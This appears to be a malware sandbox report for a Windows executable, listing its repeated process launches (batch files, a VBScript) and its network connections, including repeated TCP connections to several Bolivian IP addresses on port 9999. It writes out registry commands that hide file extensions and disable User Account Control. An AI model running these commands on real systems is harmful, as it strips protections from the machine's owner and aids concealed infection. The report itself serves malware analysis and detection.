C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AIsQskcI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nmYogMEI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XYgggEck.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TyAMIMUQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dwcAgwwo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IikMcQoY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KUEssAUI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CicMQccw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\raAoQgIM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BcMQcMck.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JiAcAkQY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yYEQckcU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AOMQMMMY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kSoMwwwo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vIgEYAEY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xocUYIEE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pKAcUksg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BeQwocEk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

Network

Country  Destination          Domain                       Proto
BO       200.87.164.69:9999                                tcp
US       8.8.8.8:53           google.com                   udp
BO       200.87.164.69:9999                                tcp
GB       142.250.200.14:80    google.com                   tcp
GB       142.250.200.14:80    google.com                   tcp
US       8.8.8.8:53           13.86.106.20.in-addr.arpa    udp
US       8.8.8.8:53           81.144.22.2.in-addr.arpa     udp
US       8.8.8.8:53           14.200.250.142.in-addr.arpa  udp
US       8.8.8.8:53           22.160.190.20.in-addr.arpa   udp
US       8.8.8.8:53           95.221.229.192.in-addr.arpa  udp
US       8.8.8.8:53           28.118.140.52.in-addr.arpa   udp
US       8.8.8.8:53           g.bing.com                   udp
US       150.171.27.10:443    g.bing.com                   tcp
US       8.8.8.8:53           10.27.171.150.in-addr.arpa   udp
US       8.8.8.8:53           154.239.44.20.in-addr.arpa   udp
BO       200.119.204.12:9999                               tcp
BO       200.119.204.12:9999                               tcp
US       8.8.8.8:53           56.163.245.4.in-addr.arpa    udp
US       8.8.8.8:53           206.23.85.13.in-addr.arpa    udp
BO       190.186.45.170:9999                               tcp
BO       190.186.45.170:9999                               tcp
US       8.8.8.8:53           77.190.18.2.in-addr.arpa     udp
US       8.8.8.8:53           43.229.111.52.in-addr.arpa   udp
US       8.8.8.8:53           tse1.mm.bing.net             udp
US       150.171.28.10:443    tse1.mm.bing.net             tcp
US       150.171.28.10:443    tse1.mm.bing.net             tcp
US       150.171.28.10:443    tse1.mm.bing.net             tcp
US       150.171.28.10:443    tse1.mm.bing.net             tcp
